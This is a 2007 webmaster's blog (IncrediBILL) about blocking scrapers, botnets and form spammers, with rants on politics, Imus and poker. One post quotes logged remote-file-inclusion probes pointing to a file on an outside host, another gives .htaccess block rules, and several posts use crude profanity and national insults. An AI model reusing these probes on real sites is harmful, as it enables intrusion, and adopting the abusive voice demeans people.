no
is it unbelievable that al gore's son was arrested again? for the second or third time?
no
is it unbelievable that al gore's son was arrested for the third time on penny ante drug charges?
no
is it unbelievable that al 3 was smoking marijuana in his car in the middle of the night?
no
is it unbelievable that he had some prescription drugs in the car with him?
no
is it unbelievable that some drugs includes quantities of xanax, valium, vicodin, adderall and soma?
no
is it unbelievable that of the prescriptions for some xanax, valium, vicodin, adderall and soma, none were in his name?
no
is it unbelievable that he was driving at 2 a.m.?
no
is it unbelievable that he was driving his prius at 100 miles per hour?
damn right it is.
100 mph in a prius? maybe if he drove it off a cliff and it was in free fall or scotty was beaming it up. down the road with tires on the pavement, i'd have to see it to believe it. clearly the whole case lacks probable cause for the traffic stop. it's a set up. bush making sure al doesn't get in the race. cause you know in this country you can't be president if your son is a jackass. wait so how did 41 get in? case dismissed, bogus traffic stop. they should have said, failed to signal a lane change like they usually do when they want to do illegal stops.
Posted by
IncrediBILL
at
7/05/2007 11:18:00 PM
0
comments
Tuesday, July 03, 2007
Google Proxy Hijacking - Myths, Urban Legends and Raw Truths
If you aren't a regular Webmaster World reader then you probably missed the most recent incarnation on the Google Proxy Hijacking situation where I had to step in and correct a lot of misinformation about Proxy Hijacking.
Go read the following:
Proxy Server URLs Can Hijack Your Google Ranking
Lots of good information there once you weed through all the misconceptions.
If you read that entire thread and still have any questions, feel free to ask!
Posted by
IncrediBILL
at
7/03/2007 10:42:00 PM
14
comments
Labels: Proxy Hijacking
Thursday, June 28, 2007
Dear Amazon AWS Group Part Deux
Back in November I wrote an open letter to the Amazon AWS Group about trying to get them to stop using the default user agent "Java/1.5.0_09".
Today I noticed that they gave me a clear response to my open request:
216.182.228.223 [domU-12-31-33-00-02-01.usma1.compute.amazonaws.com.]Oh yes, prefixing "Java/1.5.0_09" with an MSIE 6.0 user agent is MUCH better.... NOT!
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09"
Must've been getting blocked from crawling too many sites that block the default Java UA.
Nice try guys, but that's really fucking lame.
Posted by
IncrediBILL
at
6/28/2007 01:33:00 PM
1 comments
Tuesday, June 26, 2007
Easy To Spot AlphaServer Botnet
Sometimes when a distributed botnet hits your site it's quite trivial to spot their collective effort because they're using a slightly offbeat user agent that's not terribly common in the first place combined with the associated speed and time of access.
Here's the IPs and user agent used:
76.190.183.150 [cpe-76-190-183-150.neo.res.rr.com.]That little group of IPs all hit within 2 minutes of each other and came from both hosting centers and residential locations, definitely a collaborative effort, most likely a botnet.
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
71.205.86.12 [c-71-205-86-12.hsd1.mi.comcast.net.]
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
67.160.41.82 [c-67-160-41-82.hsd1.wa.comcast.net.]
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
70.224.38.36 [adsl-70-224-38-36.dsl.sbndin.ameritech.net.]
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
75.84.251.65 [cpe-75-84-251-65.socal.res.rr.com.]
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
72.232.65.34 [72.232.65.34.svservers.com.]
"Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
I've seen more little attacks/scrapes like this than you can imagine but this particular user agent struck me a amusing as it's almost a desperate cry to get caught, like they're flaunting it in our faces that many of our machines are hacked.
Posted by
IncrediBILL
at
6/26/2007 10:31:00 AM
1 comments
Labels: Bad User Agents, Bot Nets
Thursday, June 21, 2007
Javascript Cloaked Spam Pages Baffle Search Engines
Recently I ran across a large series of scraper sites that are the ultimate in openly cloaking to the search engines. The pages I see when I view the source are the same pages cached by the search engines, nothing special there so a search engine crawling outside it's IP range to check for cloaking would see the same page.
However, access those pages with javascript enabled and you are instantly redirected to a wide variety of affiliate pages. The trick is these pages all have a single embedded link to a heavily obfuscated page of javascript that redirects you to the affiliate pages.
The scraping to build these cloaked pages came from 216.75.15.26 which is in the cari.net IP range:
OrgName: California Regional Intranet, Inc.Just goes to show you that traditional cloaking is a thing of the past as the war has escalated into obfuscated javascript. The only way I see the search engines winning this war is to actually execute that javascript and see if the resulting action was to take the visitor away from the page.
NetRange: 216.75.0.0 - 216.75.63.255
Just goes to show that people claiming here in comments recently that "Stealth crawling is necessary to keep honest webmasters honest" are out of their league and don't really know what the score is on the web as the sites aren't honest when they are in plain site, no stealth needed, they worked around it.
Wonder what they'll think up next?
Posted by
IncrediBILL
at
6/21/2007 11:50:00 AM
6
comments
Labels: Damn Spam
Saturday, June 16, 2007
Blog Feed Messed Up
I just noticed that the blogger feed is all messed up and my reorganizing old posts into categories and such appears to also dump them into the feed as something new.
Stupid blogger.
Sorry for the problem, but there doesn't appear to be much I can do about this.
Be prepared for a bumpy ride of summer reruns as I organize the blog!
Posted by
IncrediBILL
at
6/16/2007 02:44:00 PM
2
comments
Contact Us Form Spammers
Well boys and girls, you didn't really think that hiding your email address behind a CONTACT US form would stop spammers did you?
I have all of my forms on my website protected except one page which I left wide open with no protection just to allow anyone having trouble with the site easily contact me. That page has just a simple form, no captcha, no referrer checks, no bot blocking, nothing, it's completely open as a safety valve for access from end users.
However, some dick head in Oman with nothing better to do has apparently decided to make it his personal goal in life to automatically post to this form.
You have to ask yourself, why is this random form page so important?
The answer is obvious as everyone hides behind CONTACT US forms and no longer post email addresses which the spammers can no longer harvest from your web page. Now it would appear they are harvesting any page with a FORM on it and trying to set up the parameters that allow them to submit spam through all these forms.
I don't run any off-the-shelf Open Source software so there is no software fingerprint on any of my pages that the mass spammers could easily find, so this is an act of desperation in manually building a bigger database of sites to spam.
Just to prove this theory, I checked to see what else this spammer was trying to do on my site besides trying to spam my contact page. Big shock, the same IP address is trying to spam the other protected pages.
Here's some other info collected from the same IP:
62.231.243.137 "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040115 Galeon/1.3.12" "massive dick sex" http://bratuha.infoI never see any of the above junk in my Inbox or anywhere else as it's all submitted on protected pages so a little information is automatically logged and the rest of the crap discarded.
62.231.243.137 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "Online tramadol. Cheap tramadol." http://
So how can I protect this form from automation and still leave it open to not impact other visitors?
We'll use one of my old favorites, a simplistic but effective approach, which is RANDOM FIELD NAMES. Each time the form is displayed the field names change so the spammer can't pre-program any code to automatically populate the fields because he won't know their name.
An argument could be made that the spammer could read the page and use the field position, but that would assume the position in the HTML is the same as the position on the page, good old CSS to the rescue.
If I want to really make it just about impossible for the spammer to figure out the page and still not use javascript or a captcha, I might use 10-20 random fields with only 3 of them chosen at random to be visible so the user would never know the difference.
Golly gee Mr. Spammer, which of those 20 random fields should you fill in?
Be careful because filling the wrong field, the field the visitor can't see, is yet another form of CAPTCHA, so choose your field wisely otherwise you're automatically going to be banned.
Maybe to be real sneaky, I'll just add new fields to the form and leave the old obsolete fields on the page so if they get filled in I know it's an old spammer script.
Just remember, keeping your email address off the web site doesn't mean you won't get spammed so secure those contact pages today!
Posted by
IncrediBILL
at
6/16/2007 12:10:00 PM
11
comments
Labels: Damn Spam
Friday, June 15, 2007
Doctor Zero Goes Scraping
Some scraper used all zeros in place of the parameters normally found in an MSIE or Firefox browser user agent.
Just look at this stupid crap:
86.21.47.45 "Mozilla/5.0 (000000000; 0; 000 000 00 0 000000; 00000; 0000000000) 00000000000000 000000000000000"You know what he got for his efforts?
86.21.47.45 "Mozilla/5.0 (000000000; 0; 000 000 00 0; 00) 000000000000000 0000000 0000 000000 000000000000"
A big fat fucking ZERO in return, nada, zip, zilch, goose egg.
I'll bet he got the same number as a grade on his computer science project in school too!
Posted by
IncrediBILL
at
6/15/2007 06:17:00 PM
14
comments
Labels: Scrapers
Sunday, June 10, 2007
Jesus Can't Help You Surf
Jesus may be his savior, but my bot blocker is mine.
68.46.236.235 [c-68-46-236-235.hsd1.fl.comcast.net.]Sorry pal, but to get access to my site you'll need something called Mozilla.
requested 1 pages as "Jesus Is My Savior"
AMEN
Posted by
IncrediBILL
at
6/10/2007 11:59:00 AM
8
comments
Labels: Bad User Agents
Tuesday, June 05, 2007
TextDigger Caught Using Stealth Shovel
Some semantic search thing called TextDigger stumbled into my spider trap today.
I have nothing against semantic search, I'm not an anti-semantite (that's not the word you think it is, read it twice, i made it up just to be punny), but I'm definitely anti-stealth crawler.
According to the bot blocker, TextDigger requested 136 pages after being challenged while using the following user agent:
64.124.138.164 [nat1.textdigger.com]Here's their IP range:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
TextDigger MFN-B849-64-124-138-160-28 (NET-64-124-138-160-1)Not sure if what hit my server was their actual main crawler or not, but they aren't gaining any brownie points with me crawling in stealth for any reason.
64.124.138.160 - 64.124.138.175
Posted by
IncrediBILL
at
6/05/2007 11:47:00 AM
10
comments
Labels: Bad Bots
Thursday, May 31, 2007
BotNets Hosting Files On Lycos UK
Found this amusing little botnet attack for random vulnerabilities today that was pointing to Lycos.co.uk as the host of their little file.
85.25.148.223 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.803"
85.25.148.223 - "GET //rpm-pl/php-manual-ru.html?hl=http://members.lycos.co.uk/modelteam/echo.txt? " "libwww-perl/5.803"
193.144.43.198 - "GET //index.php?newlang=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.65"
193.144.43.198 - "GET //rpm-pl/php-manual-ru.html?hl=http://members.lycos.co.uk/modelteam/echo.txt?"
"libwww-perl/5.65"
193.144.43.198 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.65"
66.194.211.86 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.79"
66.194.211.86 - "GET //index.php?newlang=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.79"
Quite amusing that the botnets are now leveraging large companies member services to do their evil bidding.
Posted by
IncrediBILL
at
5/31/2007 03:23:00 PM
0
comments
Labels: Bot Nets
Tuesday, May 29, 2007
Bot Blocker Tracking More Than 80K Unique IPs
Lately I've been doing some analysis work on my database of IPs that I'm tracking for bad behavior and it exceeded 80K unique IPs. Many of these are from data centers, bot nets, home-based scrapers and then some, but it's a staggering number when it exceeds 80K.
People always wonder why I'm such an anti-scrape nazi but it's really not hard to see the problem when you multiply 80K IPs trying to scrape an excess of 40K pages, which is a potential for having over 3 BILLION pages scraped in the last year.
Here's the number with all the zeroes: 3,200,000,000 pages.
OK, that's really a lot of pages and there's no way I'm paying for that kind of bandwidth.
I seriously doubt they would ever hit the maximum pages but there's no way I'm unlocking the doors and let them run rampant just to find out how bad it would really get.
Here's a sample of 3 greedy fuckers that paid a visit just today:
82.34.200.237 [82-34-200-237.cable.ubr05.hari.blueyonder.co.uk.] requested 710 pages as "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1020.2544-big; Windows XP 5.1; MSIE 6.0.2900.2180)"
70.80.186.223 [modemcable223.186-80-70.mc.videotron.ca.] requested 1071 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
201.58.219.234 [20158219234.user.veloxzone.com.br.] requested 329 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
They only got a couple of pages before getting nothing but garbage, but they just keep trying. Based on the location of the IPs, I'm thinking it might be compromised machines in a botnet trying to scrape from stealth locations, hard to say.
The best part is, they're now charter members of my AUTO-QUARANTINE list of IPs meaning they're blocked from accessing any pages on their next trip unless a human is at the controls, and even then, they could get locked out real fast if they aren't careful!
Posted by
IncrediBILL
at
5/29/2007 06:43:00 PM
11
comments
Labels: Bad Bots
Monday, May 21, 2007
Top 10 Signs Your Website Has Made it Big
People ask me every now and then how to tell when their website has finally hit the big time.
In response, I compiled a Top Ten list of things that come to mind based on my own experience.
Top Ten Signs Your Site Has Made it Big
- Your site traffic is higher than you could ever imagine and you pinch yourself daily to make sure you're not dreaming.
- Email fills your Inbox non-stop all day long with no prayer of it all ever being answered.
- Other webmasters constantly pester you to swap links with their site and you already have so many quality back links you can say "No Thanks!" without even checking their site.
- People from around the country (world) start calling your phone number that don't comprehend the terms "9-5 PST".
- You don't go searching new business opportunities, they seek you out.
- People ask your advice for all sorts of business related topics that previously wouldn't have asked you for the time of day.
- Media marketing companies call you to get their ad network on your site and you can easily decline all those offers because they simply don't pay enough for your space.
- Everyone wants their products to be displayed on your site and you can actually negotiate a better payout than the rest of their affiliates.
- Hiring employees or contractors to run your website and help with your business issues is suddenly a possibility.
- And the top sign your site has made it big:
You start cashing really big fat checks on a regular basis.
Posted by
IncrediBILL
at
5/21/2007 10:59:00 AM
7
comments
Saturday, May 19, 2007
Hosting Company Blocks Bots
Looks like we overlooked this little press release last year when Mecca Hosting announced Mecca Hosting Bounces Bad Bots from their servers.
Here's the good stuff:
Mecca Hosting, a leader in providing customized hosting solutions, has just released a new system to detect and block suspicious automated programs or "bots". Mecca Hosting's new system, by blocking these bad bots, helps protect customer's intellectual property, e-mail addresses, and prevents blog spamming and hacker attacks. This new system can detect good bots, like Search Engines and specialized tools, to allow them access to websites, while blocking the bad ones. This new technology will result in vastly increased website uptime and performance, due to the expected reduction in hack attempts; mainly because hackers use automated tools to find system vulnerabilities.Sounds good, but how good is it?
Just to see if it basically worked, I used a few tools to try to snag a page or two and got bitch slapped with 403 errors.
Not bad Mecca, not bad.
If we could just get all hosts to do this, and even dedicated server companies to offer this kind of technology, maybe the scrapers would already be out of business.
Posted by
IncrediBILL
at
5/19/2007 02:31:00 PM
3
comments
Labels: Bad Bots
Tuesday, May 08, 2007
Block LIBWWW-PERL and web addresses to protect your site from botnets
Not only do I block all accesses from libwww-perl, I also log what they were looking for which turns up an amazing amount of botnet hits on a daily basis just randomly hitting websites trying to find a way inside.
The first trick to securing your site from the script kiddies is to block any user agent that contains "libwww-perl" which will stop the dumb ones from owning your site.
Try adding this to your .htaccess file:
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]The next trick is to filter out things in your QUERY_STRING such as "=http:" which is a typical in the botnet scripts that attempt to upload files to vulnerable software. This won't impact most other applications because file uploads tend to be done via a form and a POST, not a GET command.
With these 2 minor security changes you've eliminated many vulnerabilities from botnet attackers and blocked their method of uploading files.
It's not 100% but it may be enough to help you survive the next time your Open Source application gets a vulnerability until you can actually apply the patch.
Posted by
IncrediBILL
at
5/08/2007 06:11:00 PM
4
comments
Greedy French Scraping Bastard
This swine from the land of overpriced wine asked for robots.txt then tried to rip over 1300 pages.
83.198.150.2 "GET /robots.txt HTTP/1.0" 200 146 "-" "-"Too bad Pepe Le Pew, your feeble scraping attempts SUCK and you got 1300+ pages of error messages so Phuck Off.
83.198.150.2 [ALille-252-1-48-2.w83-198.abo.wanadoo.fr.] requested 1321 pages as "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0)"
[sing a long with apologies to Cheryl Crow...]
All I wanadoo is scrape some pages,
We'll download it, and not take ages.
All I wanadoo is grab your site,
And then cloak it all to Google tonight!
Posted by
IncrediBILL
at
5/08/2007 01:40:00 PM
0
comments
Labels: Bad Bots
Sorry Pharma Spammer Strikes Again
Some miserable asshole is using "Sorry for subject" as a spam topic and attempting to spam from all over the world. Mainly it's one IP in Germany with some others from other locations.
Most of the links they're spamming are for pharma related sites but there was an actual domain park page thrown in as well which really made me giggle.
The most fun is my spam blocker that I wrote never lets any of this shit through to my website, but just silently logs it so I can go back and see what these shit-for-brains are doing later just for my own amusement, plus collecting the IPs to block.
Here's the German sorry spammer:
62.141.53.139 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "Sorry for subject" http://tramadol.4hfs.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" "Sorry for subject" http://phentermine.4hfs.net
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051102 Firefox/1.6a1" "Sorry for subject" http://tramadol.hfslink.com
62.141.53.139 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "Sorry for subject" http://tramadol.4hfs.net
62.141.53.139 "Mozilla/4.0 (compatible; ICS 1.2.105)" "Sorry for subject" http://phentermine.2hl.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20041122 Firefox/0.5.6+" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" "Sorry for subject" http://tramadol.4hfs.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8a) Gecko/20040416 Firefox/0.8.0+" "Sorry for subject" http://phentermine.viphls.org
62.141.53.139 "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.10) Gecko/20050716 Thunderbird/1.0.6" "Sorry for subject" http://tramadol.medhls.com
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15" "Sorry for subject" http://tramadol.medhls.com
62.141.53.139 "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126" "Sorry for subject" http://phentermine.viphls.org
Here's the rest of the sorry spammers:
59.93.35.80 "Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "Sorry for subject" http://phentermine.10pharm.com
60.217.227.141 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "Sorry for subject" http://phentermine.viphls.org
68.10.68.144 "Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686) Opera 7.20 [en]" "Sorry for subject" http://tramadol.madnewus.com
69.249.59.232 "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.6) Gecko/20040206 Firefox/0.8" "Sorry for subject" http://cialis.mednewus.com
86.139.64.133 "Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC Mac OS X; en) Opera 8.0" "Sorry for subject" http://tramadol.hfslink.com
89.208.4.195 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "Sorry for subject" http://ativan.10pharm.com
200.49.102.100 "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8" "Sorry for subject" http://tramadol.4mednew.com
200.55.113.119 "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "Sorry for subject" http://tramadol.2hl.org
201.17.208.188 "Opera/8.01 (Windows NT 5.1)" "Sorry for subject" http://tramadol.4hfs.net
201.45.41.153 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" "Sorry for subject" http:///tamiflu.hlspharm.info
210.87.251.41 "Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040707 Firefox/0.9.2" "Sorry for subject" http://zetia.hlspharm.info
218.38.9.218 "Mozilla/4.76 [en] (Windows NT 5.0; U)" "Sorry for subject" http://phentermine.cvipm.com
220.78.229.119 "Mozilla/5.0 (Windows; U; WinNT4.0; en-CA; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1" "Sorry for subject" http://tramadol.10pharm.com
You're such a sorry fucking spammer you don't even know you're just wasting your time you stupid fuckhead.
Posted by
IncrediBILL
at
5/08/2007 01:28:00 PM
0
comments
Monday, April 30, 2007
Why Do Poker Players Overstay Their Welcome?
I've been playing poker most of my life and no-limit Texas Hold'em for almost 20 years now and it never ceases to amaze me that people who are winning money, the table chip leaders, will continue to sit at that table until they bust.
What they hell is wrong with you poker players out there?
Hint: If you get a big pile of chips, GO HOME!
These people are obviously addicted to the rush of going "all-in" and sure they can double up their stack yet again and consistently lose it all.
The games I tend to play are either a 1-1-2 spread limit or a 2/4 no-limit, both with a minimum $4 bet and you can buy-in with a $100 minimum. Now the object of this game, at least my object, is to sit tight and wait for good cards while watching the play, maybe up to an hour without really getting involved with the action.
Do the math as my strategy really isn't that hard.
You pay for nothing but the blinds, unless you get killer hole cards, then you make your move.
The blinds in this game are typically $6 per each time 9 hands are dealt around the table, so you get to see 9 sets of hole cards for only $6. Better yet, you get to study how your opponents play 9 times (assuming 9 players per table) for $6 even if you take no action. This means for a measly $100 you can evaluate up to 9 hands per blind for 16 blinds, or a whopping 198 hands of cards.
The next thing is you NEVER buy-in for more than the minimum, which is $100 at this game, even if you could buy-in for $200 or more. Why you do this is you're protected in an all-in bet limited by your current table stakes. This gives you a lower risk all-in opportunity to double up your money for each $100 you buy-in. If you lose an all-in bet you've never lost more than $100 so you still hopefully have another $100 in your pocket to get more chips and try again.
Now the real secret, IMO, is to never spend more than $300 per day playing this game otherwise you quickly get upside down losing so much you have to keep chasing pots to get back even, let alone winning. If the cards are that bad and you've already lost $300, which would be about 3 hours playing for me, it's time to go home and try again another day.
Do I sound like a cheap gambler to you?
Hell no, just a smart one.
Been there, done the big stakes, the game is still the same small or low stakes.
The idea is always to play on THEIR money and not use YOUR money if possible. My investment in the game is just the bankroll to get the first big win and then I gamble using my winnings to get to the next bigger win. I could easily be into a game for a thousand dollars but that would be stupid as the object is to build off a smaller bankroll and then play on other peoples money. If you see me sitting with a thousand dollars in front of me you can bet your ass I have typically no more than $200 invested in the game. If I start to lose and see my stacks of chips declining, I always try to get out at a minimum with at least what I started with, and some winnings as well, not go completely bust like I see so many others do consistently.
Now that you have an idea of how I play, a little backgrounder on me, let's get back to the topic of people that overstay their welcome...
I took a break from no-limit poker for a couple of years, not because I didn't want to play, but because I couldn't find any good games locally. Then a few months ago I came across the exact same version of the No-Limit Texas Hold'em game I always used to play and it was a blast. So far recently I've played it 6 times and won 5 times, cleaned up all but one night when the cards just plain stunk.
On a couple of these games, I walked up to the table and there was a definitive chip leader with $800-$1000 piled up in front of them. One of them was a really solid tight player and the other was a loose player chasing pots that just happened to get lucky. The tight player sadly got a bad run and started losing to me with such hands as my King-high flush all-in against their Queen-high flush, and so on and so forth, one bad beat after another until I broke him on a final all-in bet. The loose player was a different night, ah well, he would bet large amounts on an Ace-high nothing into my 2 pair, and similar bad bets, and literally thought he could bully me out of the pot with bigger bets but I called and broke his ass as well.
When I took their big pile of chips guess what I did?
I WENT HOME!
Remember what I said, they overstayed their welcome and gave it all back. I didn't overstay my welcome, I cashed out and went home, adding their money to my gambling war chest.
Until next week...
Posted by
IncrediBILL
at
4/30/2007 01:36:00 PM
0
comments
Wednesday, April 25, 2007
Myths About CAPTCHA's
For those that don't know what a CAPTCHA is, it's something that typically a human can answer but automated software can't figure out. An example of this is on the comments page of this blog which has a box with the squiggly letters you have to type in before you can submit a comment.
Some people are declaring that it's the end of the CAPTCHA era either with human powered sites that trick visitors into providing the answer to the CAPTCHA, or automated image recognition software that just needs time and a little computing horsepower to decode the text in the image.
Myth #1 - CAPTCHA's aren't accessible to the visually impaired.
Accessibility issues are a legitimate complaint for some sites that don't implement a robust accessible CAPTCHA solution. For instance, the visually impaired can use the alternative audio CAPTCHA used on this very blog that solves this simple problem. Other types of CAPTCHAs that are math or word problems which are easier to read are also accessible.
Myth #2 - All CAPTCHA's are those squiggly text things seen on blogs.
Most of the comments about CAPTCHA's are based on the one type of CAPTCHA that uses extremely bent and distorted text called Gimpy. However, Gimpy is just scratching the surface when it comes to CAPTCHAs as they come in many forms.
Some of the other CAPTCHAs variants include identifying what's contained in a picture, simple math questions like "1 + 4 = ?", a text question like "What color is the sky?", or typing in the letters or numbers played via audio.
If you don't think people can spell "BLUE" or answer the math question properly you can always give them a nice drop list of possible answers and only give one chance to answer per question to stop bots from hacking at the answer.
Myth #3 - Bots can easily "BLOW THROUGH" CAPTCHAs.
When humans are being used to provide CAPTCHA answers that can be the case, but only when you implement sloppy CAPTCHA code in the first place. You can use a series of security measures to make sure there's a human sitting at the keyboard and it's not being passed through by a bot.
- Require Javascript to validate the CAPTCHA since the majority of bots don't run Javascript in the first place.
- Obfuscate your CAPTCHA in randomized encoded Javascript so that it's difficult, if not impossible, for a bot to even detect the presence of a CAPTCHA on the page in the first place.
- Use Javascript input sensory techniques such as MT Keystrokes to detect whether a human has actually typed into the field on the web page.
- Randomize the type of CAPTCHA being used so that there isn't a single specific type of CAPTCHA to target with an automated tool.
The real vulnerability of most forums, blogs and wikis face isn't even the risk of CAPTCHA failure, it's the identical footprint of all the Open Source software which makes locating the comments pages so easy.
Changing the name of the anchor text and page name on a blog from "comments" and "comments.php" to "Post an Opinion" and "youropinion.php" is another form of CAPTCHA because the human will immediately know where to click but the bot might get confused.
Better yet, since most bots don't read javascript, simply obfuscate the actual HTML of your "Leave a Comment" section in Javascript. When bots can't even find the link to "leave a comment" or the form fields where you enter a comment in HTML it may eliminate the need for the more complex text bending CAPTCHA's in the first place. Sure, the spammers could code the bot to decode a single instance of obfuscated Javascript for a single blog, but the code itself could be randomly obfuscated so that it would be quite a difficult task.
Don't let the naysayers dissuade you from increasing the strength of your spam blocking as stronger CAPTCHA's combined with Javascript tricks appear to be bulletproof until the bots get a lot more complex and smarter.
P.S. Note that the guy claiming CAPTCHA's are dead doesn't have one on his blog and if you scroll down past the actual comments you'll see he has a shitload of porn spam at the bottom. Obviously someone knee deep in spam is NOT the person you should be listening to about whether or not to use a CAPTCHA.
Posted by
IncrediBILL
at
4/25/2007 09:16:00 AM
2
comments
Saturday, April 21, 2007
Gigablast Data Trail
While following where my data goes on the internet I found a couple of sites that appear to be using data from Gigablast which include eWoss and searchEstate.
The upside is fewer crawlers as they're leveraging existing data crawls in multiple locations.
The downside is that you have no control where your information shows up so the only way to control that relationship is block the source.
Update: Also found Gigablast content in Webled as well.
Posted by
IncrediBILL
at
4/21/2007 11:18:00 AM
4
comments
Labels: Bad Bots
Thursday, April 19, 2007
Ezilon Also Has Some LookSmart Content
This time my content tracking bugs led me to Ezilon which has content that originated from LookSmart. Don't know if Ezilon is a LookSmart partner or what the deal is, perhaps they scraped LookSmart, but the link to one of my sites in their listings was definitely crawled by LookSmart.
Just goes to show that blocking bad bots from your site doesn't always stop your content from being misappropriated anyway.
Update: Also found LookSmart data in xogger.com.
Posted by
IncrediBILL
at
4/19/2007 11:31:00 AM
0
comments
Labels: Bad Bots
Sunday, April 15, 2007
5 Reasons Why I Blog - Tagged By a Boy Named Sue
Looks like old anti-spam Connie tagged me because I'm a second-rate blogger that's about as popular as a fart in an elevator, but I'll accept that tag and play the game.
So here goes with my 5 reasons why I blog:
1. Because I'd probably get kicked off most, if not all forums, for saying some of the shit I say. Therefore, the best way to truly express my opinions and not get a boot to the head was to take it elsewhere, and the blog was born.
2. If I didn't blow off some steam every now and then when things are really pissing me off, my fucking head would explode, therefore blogging is also done for medicinal purposes.
3. My wife is probably sick and tired of hearing me rant and rave about things that get under my skin so I blog them out, then she can read it once, or I might read it to her, and it's over with. The blog may actually be saving my marriage until I blog about her one too many times, or about the wrong topic, and then the shit will hit the fan for sure.
4. I actually have some useful information to pass on from time to time and the blog is as good as any place to post it.
5. Blogging about exposing, blocking and whacking scrapers and spammers pisses them off so the blog gives us a nice virtual parking lot to duke it out.
There, I've done the deed, 5 fandamntastic reasons why I blog.
Looks like I should tag 5 other people just because misery loves company:
John Andrews - because I know John dislikes following the herd
MartiniBuster - just so I can imagine him rolling his eyes at me
SpamHuntress - so she'll get off MySpace and start blogging again
John Scott - he's been so intermittently blogging someone needs to kickstart his ass
WillMac - bots make him as crazy as they do me, so he needs to share
That's all for this time and may whoever comes up with the next game of blog tag get a big swift kick in the nuts from all of us that feel dragged into this shit whether we want to play or not.
Posted by
IncrediBILL
at
4/15/2007 06:11:00 PM
4
comments
Friday, April 13, 2007
Don Imus Joins Ranks of Unemployed
I've always hated Imus and just the sound of his voice and his idiotic bullshit made me want to smash radios.
Then those idiots over at MSNBC decided to put that stupid fucker on TV so the country could see that walking corpse spew bullshit in living color. That was the last day I ever watched MSNBC simply because it wasn't worth the risk of accidentally seeing that past-the-expiration-date walking organ donor still polluting the tube.
Now, thank the gods, he has aimed his prejudiced venom at the wrong bunch of women and not only has MSNBC gained a potential viewer when they canceled his dawn-of-the-dead carcass but CBS then followed suit and booted his old dusty ass to the curb.
Bye bye Imus, I won't miss you one fucking bit.
TIP FOR IMUS: Don't call the lady processing your unemployment claim a "nappy-headed ho" or she'll slap your ass into next week.
Posted by
IncrediBILL
at
4/13/2007 06:00:00 PM
1 comments
Labels: Classic Rants
Sunday, April 08, 2007
Webaroo's Content Stealing PulseBot Flatlined
